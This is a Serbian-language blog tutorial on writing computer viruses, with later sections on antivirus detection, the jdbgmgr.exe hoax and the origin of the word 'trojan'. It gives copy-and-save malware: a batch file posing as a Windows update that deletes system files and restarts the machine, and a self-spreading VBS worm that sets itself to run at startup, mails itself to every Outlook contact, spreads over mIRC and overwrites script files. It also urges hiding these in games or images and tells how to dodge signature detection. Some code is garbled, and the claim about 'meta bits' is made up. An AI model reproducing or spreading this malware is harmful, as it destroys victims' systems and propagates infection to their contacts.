Sta su virusi?
Na pocetku tutoriala cu vam objasniti sta su virusi, iako je vecina mozda i okusila nevolje koje virus donosi. Virus je zapravo program ili skripta (java, vbasic…) napravljena da nasteti vasem kompjuteru i koji se moze sam i bez vaseg znanja kopirati na floppy i slati preko e-maila koristeci vase mail adrese u Address Book-u (to su takozvani CRVI ili WORM). Pored toga neki virusi su napravljeni tako da zaraze i ostale fajlove na vasem kompjuteru.
[Kako se prave?]
Za pravljenje virusa mogu se koristiti svi moguci programski i skripting jezici. Da bi ste vi sami mogli da pravite neke vrste virusa morate da znate odredjene programske jezike. Zato vam savetujem da, ukoliko neznate, naucite neki programski jezik. Ukoliko zelite da postanete haker morate znati c, c++,java,skripts i perl programske jezike.
U daljem tekstu slede 2 primera *.BAT virusa i *.TXT.VBS virusa koje je veoma jednostavno napraviti i koji ce vam malo pribliziti pojam pravljenja virusa! Naravno, da bi ih razumeli morate znati BATCH i VISUAL BASIC skripting jezike.
Ukoliko bi vi zeleli da napravite *.bat virus, evo vam malog primera kako da to uradite. Potrebno je samo da sledeci batch kod iskopirate u notepad i snimite ga kao winupdt.bat fajl i eto vam malog virusa! Ovaj virus se predstavlja kao UPDATE za Windows , ali je zapravo virus koji ce obrisati vazne sistemske fajlove, kao i Windows Explorer i zatim restartovati racunar. Jednom napravljen ovakav virus mozete ubaciti i u neki fajl kao kamuflazu (program,igricu,txt,sliku,mp3 itd.), a to ce vam najlakse biti uz pomoc nekog Droppera i Binder-Joiner (npr. MultiBinder), sem ukoliko znate c/c++ programski jezik… HeHeHe Very Happy (da bi naucili ovaj programski jezik downloadujte tutorial sa naseg sajta, ili potrazite neki na NETu).
######### SECI OVDE #########
@ECHO OFF
echo Welcome To Microsoft Windows System Updater Setup
echo Installing Components… Please Wait…
echo y|del c:autoexec.bat
echo y|del c:config.sys
echo y|del c:windowssystem.ini
echo y|del c:windowswin.ini
echo y|del c:windowsexplorer.exe
echo Installing is DONE.
echo Setup Will Now restart Your Computer… Please Wait…
start C:WINDOWSsystem32RUNDLL.EXE user.exe,exitwindows
######### SECI OVDE #########
VBA crvi koriste posebnu tehniku kako bi zavarali potencijalnu zrtvu. Pored toga sto crv nema ekstenziju EXE vec VBA ili VBS (sto znaci da su pisani u Visual Basic Script formatu i da je za njihovo izvrsavanje potreban IE), takvi crvi se obicno distribuiraju sa extenzijom ‘.txt.vba’, tako da potencijalna zrtva pomisli da se radi o obicnom tekstu i startuju fajl. Posto je zadnja ekstenzija ‘.vba’, ne startuje se Notepad vec IE koji izvrsi program, tako da potencijalna zrtva postane prava zrtva.
Sledeci virus je srpska verzija virusa I_LOVE_YOU, samo sto je mnogo opasniji i mnogo bolji. Ovaj kod ce te takodje iskopirati u notepad, ali snimicete ga kao volim_te.txt.vbs Virus je odlican, sam se kopira i salje putem e-maila ili preko mIRC-a.
######### SECI OVDE #########
‘Virus volim_te.txt.vbs Created By VokySoft. 11/2/2002
Set HFFLUN1U = createobject(”scripting.filesystemobject”)
HQO5518H = HFFLUN1U.getspecialfolder(1)
R125B3VC = HQO5518H & “volim_te.txt.vbs”
Set SO2ERHGU = createobject(”wscript.shell”)
SO2ERHGU.regwrite “HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunWinUpdate”, “wscript.exe ” & R125B3VC & ” %”
HFFLUN1U.copyfile wscript.scriptfullname, R125B3VC
O8UN6TKP
If SO2ERHGU.regread(”HKLMSOFTWAREMicrosoftWindowsCurrentVersionvolim_te.txt.vbsP6OIH9283) <> 1 then
EU3V0765
End if
If SO2ERHGU.regread(”HKLMSOFTWAREMicrosoftWindowsCurrentVersionvolim_te.txt.vbsT7UT85823) <> 1 then
EJSL7CBE “”
End if
Set M79N43AH= HFFLUN1U.opentextfile(wscript.scriptfullname)
IC4FESF6 = M79N43AH.readall
M79N43AH.close
Do
if not(HFFLUN1U.fileexists(wscript.scriptfullname)) then
set I1JH1J72= HFFLUN1U.createtextfile(wscript.scriptfullname)
I1JH1J72.write IC4FESF6
I1JH1J72.close
end if
UDT5953N = SO2ERHGU.regread(”HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunWinUpdate”)
If UDT5953N <> “wscript.exe ” & R125B3VC & ” %” then
SO2ERHGU.regwrite “HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunWinUpdate”, “wscript.exe ” & R125B3VC & ” %”
end if
UDT5953N= “”
loop
Function EU3V0765()
Set GJ7P4911 = CreateObject(”Outlook.Application”)
If GJ7P4911 = “Outlook” Then
Set KECO30GA = GJ7P4911.GetNameSpace(”MAPI”)
Set L219C6V2 = KECO30GA.AddressLists
For Each H82H7563 In L219C6V2
If H82H7563.AddressEntries.Count <> 0 Then
A5II2553 = H82H7563.AddressEntries.Count
For S8JO7233 = 1 To A5II2553
Set K7623MOJ = GJ7P4911.CreateItem(0)
Set H541TU1Q = H82H7563.AddressEntries(S8JO7233)
K7623MOJ.To = H541TU1Q.Address
K7623MOJ.Subject = “cao”
K7623MOJ.Body = “Cao, ” & vbcrlf & “nadam se da ces ovo procitati i” & vbcrlf & “da ces razumeti…” & vbcrlf & “”
execute “set ISHK15M5 =K7623MOJ.” & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
UVSBA4Q2 = R125B3VC
K7623MOJ.DeleteAfterSubmit = True
ISHK15M5.Add UVSBA4Q2
If K7623MOJ.To <> “” Then
K7623MOJ.Send
End If
Next
End If
Next
End If
End function
Function EJSL7CBE(N46SM3R1)
If N46SM3R1 <> “” Then
RH5KFA0D = SO2ERHGU.regread(”HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir”)
If HFFLUN1U.fileexists(”c:mircmirc.ini”) Then
N46SM3R1 = “c:mirc”
ElseIf HFFLUN1U.fileexists(”c:mirc32mirc.ini”) Then
N46SM3R1 = “c:mirc323
ElseIf HFFLUN1U.fileexists(RH5KFA0D & “mircmirc.ini”) Then
N46SM3R1 = RH5KFA0D & “mirc”
ElseIf HFFLUN1U.fileexists(RH5KFA0D & “mirc32mirc.ini”) Then
N46SM3R1 = RH5KFA0D & “mirc”
Else
N46SM3R1 = “”
End If
End If
If N46SM3R1 <> “” Then
Set C1JLJ66F = HFFLUN1U.CreateTextFile(N46SM3R1 & “script.ini”, True)
C1JLJ66F = “[script]” & vbCrLf & “n0=on 1:JOIN:#:{”
C1JLJ66F = C1JLJ66F & vbCrLf & “n0=on 1:JOIN:#:{”
C1JLJ66F = C1JLJ66F & vbCrLf & “n1= /if ( $nick == $me ) { halt }”
C1JLJ66F = C1JLJ66F & vbCrLf & “n2= /.” & Chr(100) & Chr(99) & Chr(99) & ” send $nick “
C1JLJ66F = C1JLJ66F & R125B3VC
C1JLJ66F = C1JLJ66F & vbCrLf & “n3=}”
script.Close
End If
End Function
Function VB17JIJS()
On Error Resume Next
Set HVNE84R3 = HFFLUN1U.Drives
For Each SPBC4Q28 In HVNE84R3
KA61L0PN = SPBC4Q28 & ” “
Call I1HE2CE2(KA61L0PN)
Next
End Function
Function I1HE2CE2(P8HO634G)
FD6T6S1N = P8HO634G
Set F54HU6J5 = HFFLUN1U.GetFolder(FD6T6S1N)
Set KS2NN47N = F54HU6J5.Files
For Each S9C7C2GI In KS2NN47N
If lcase(S9C7C2GI.Name) = “mirc.ini” Then
EJSL7CBE(S9C7C2GI.ParentFolder)
End If
If HFFLUN1U.GetExtensionName(S9C7C2GI.path) = “vbs”
HFFLUN1U.CopyFile wscript.scriptfullname,S9C7C2GI.path,true
End if
If HFFLUN1U.GetExtensionName(S9C7C2GI.path) = “vbe”
HFFLUN1U.CopyFile wscript.scriptfullname,S9C7C2GI.path,true
End if
Next
Set P67O4ULQ = F54HU6J5.Subfolders
For Each PR35UKR1 In P67O4ULQ
Call (PR35UKR1.path)
Next
End function
Function O8UN6TKP()
SO2ERHGU.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRegisteredOwner”,”IMAS_VIRUS”
end function
######### SECI OVDE #########
(evo malo casova o AntiVirus tehnologiji i zastiti)
Od pojave novog virusa pa sve dok ga neka AntiVirus Laboratorija ne detektuje prodje uvek ali uvek
6 meseci pa cak i do 2 godine dok se ne napravi zastita….
Detekcija naravno zavisi od stepena rasirenosti i prijava na dejstvo virusa u kompjuteru
Sto znaci ako se virusom napadne neka velika kompanija onda ce detekcija biti brza
zapravo postoje cak predpostavke da na svetu postoji jos plus 100.000 virusa koji su ne detektovani
jer kruze u malom broju racunara u siromasnim i ne tako dostupnim krajevima sveta, koji imaju lose
modemske veze i nisu tako cesto prikljuceni u mrezu…Detekcija je otezana ili skoro ne moguca
Kada AntiVirusna laboratorija detektuje odredjeni virus, ona okuplja svoj tim strucnjaka - programera
da napisu zastitu kojom ce se ovaj virus onesposobiti..
Naime, oni izvrnu code virusa i dobro ga prouce…..Zatim pisu zastitu koja ce ga detektovati (prepoznati)
i obrisati…Detekcija se vrsi na vise nacina:
1.) Prepoznavanjem velicine u meta bitovima
( Meta bitovi su ako niste znali jos manje jedinice od bita koje opisuju bitove) .
2.) Prepoznavanjem imena i exstenzije
3.) Prepoznavanjem strukture koda ( sto znaci da prepozna sta taj virus radi, npr. izbrise neki vazan fajl ,
otvori port, kopira se, spijunira, salje se preko mail i td…
4.) Zastita od pojave novih ne detektovanih virusa ( zastita uporedjivanjem slicnosti )
uporedjivanjem sa bazom informacija , imena i kodova od vec postojecih potpisa —( hahahah—aaa malo sutra )
————————————————————————————————————————————————————–
Sto znaci ; da ako autor virusa promeni ime ili exstenziju ili velicinu i bitnije izmeni kod ——eto novog ISTOG virusa
i eto jos narednih 6 meseci slobodnog bitisanja u cyber prostoru…cool zar ne
[Zavrsna rec]
Primere virusa koji se nalaze u ovom tekstu vam nisam napisao kako bi ih vi iskopirali i poceli da unistavate tudje kompjutere, vec samo da bi ukapirali kako se oni prave i da vam ukazem na to kako oni izgledaju.
——————————————————————————–
Hoax - lazna uzbuna
——————————————————————————–
[Virus ili Hoax?]
—–
Nasao sam ovaj virus na mom C drajvu.
Molim procitajte!!! Veoma je vazno!!!
Nas address book je zarazen virusom i, kao posledica i vas je jer je vasa adresa u nasem adresaru. Virus se zove jdbgmgr.exe. Ne mogu da ga otkriju Norton ili McAfee anti virus programi. Miruje 14 dana pre ostecenja sistema. Automatski ga salju messanger i address book, bez obzira da li saljete e-mail. Da bi ste ga se oslobodili:
1. Idite na Start, potom Find ili Search;
2. U Files/Folders upisite ime jdbgmgr.exe;
3. Ne zaboravite da pretrazite C drajv;
4. Kliknite na Find ili Search;
5. Virus ima ikonicu medvedica sa imenom jdbgmgr.exe - NE OTVARAJTE;
6. Kliknite desnim tasterom i obrisite ga odatle.
AKO NADJETE VIRUS KONTAKTIRAJTE SVE IZ VASEG ADRESARA
—–
Ovo je jedan od najpoznatijih primera hoax-a u poslednje vreme. Mnogo poruka sa prakticno identicnim sadrzajem je razmenjeno, mnogo tekstova, upozorenja, objasnjenja napisano, ali ocigledno da jos ima korisnika racunara koji za ovo nisu culi. Moram ukratko da objasnim dve stvari: sta je hoax i o cemu se u konkretnom slucaju radi. Hoax je lazno obavestenje o otkricu virusa. Po pravilu je intonirano veoma dramaticno, uz upozorenje o katastrofalnim posledicama njegovog delovanja, nemogucnosti detekcije bilo cime i praceno uputstvom za uklanjanje “opasnosti” sa racunara. Naravno, tu je i molba da se poruka prosledi svima ciju adresu imate. Naivni korisnici racunara ovako i postupe, sto ima dve negativne posledice: brisanje nekog vaznog fajla sa racunara i zatrpavanje ljudi nezeljenom postom (mada iz dobre namere). Ovako se moze ostetiti funkcionalnost operativnog sistema i navuci na sebe (opravdani) bes primalaca nezeljene poste. Jdbgmgr.exe je fajl koji se nalazi na skoro svim racunarima koji rade pod Windows-ima. Detaljnije informacije mozete naci na: http://support.microsoft.com/default.aspx?scid=kb;en-us;Q322993 Zvanicni naziv fajla je Microsoft Debugger Registrar for Java. Nema potrebe za preduzimanjem bilo kakvih preventivnih mera. Koriste ga samo oni koji se bave Microsoft Visual J 1.1. Drugim recima, ako ne spadate u ovu grupu korisnika nece biti nikakve stete i ako obrisete pomenuti fajl, osim ako ne pravite Java programe. Stoga necu opisivati postupke za njegovo vracanje.
Zakljucak iz ovog slucaja moze da bude da ne verujete svemu sto procitate. Ako dobijete poruku slicnu ovoj, pre nego sto preduzmete bilo kakvu akciju ciscenja racunara, proverite sajtove proizvodjaca AV software-a, trazeci u opisima virusa ime onog o kome vas obavestavaju. Mozete ici i na www.google.com i kao rec za pretragu uneti “ime fajla”. Sigurno cete negde naci pouzdano obavestenje iz relativnog izvora. Naravno, nemojte prosledjivati poruku ni na jednu e-mail adresu, a kamoli na sve adrese koje posedujete.
——————————————————————————–
Trojanac (trojanski konj)
——————————————————————————–
[Malo casova istorije]
Trojanci su svoje ime dobili prema cuvenom epu o opsadi Troje, koju su Grci bezuspesno napadali 10 godina i na kraju se povukli ostavljajuci pred njenim ulazom ogromnog konja kao znak priznavanja poraza. Trojanski ratnici su odusevljeno konja uvukli unutar grada i posvetili su se proslavljanju svoje velike pobede. Medjutim, kada su svi zaspali pijani, na konju su se otvorila dobro skrivana vratanca i iz njega je izasao odred grckih ratnika koji je otvorio vrata tvrdjave pustajuci unutra ostale Grke, koji su povlacenje iscenirali i cekali na taj trenutak. Nakon toga Troju su veoma lako zauzeli.
Post je objavljen 03.04.2008. u 13:44 sati.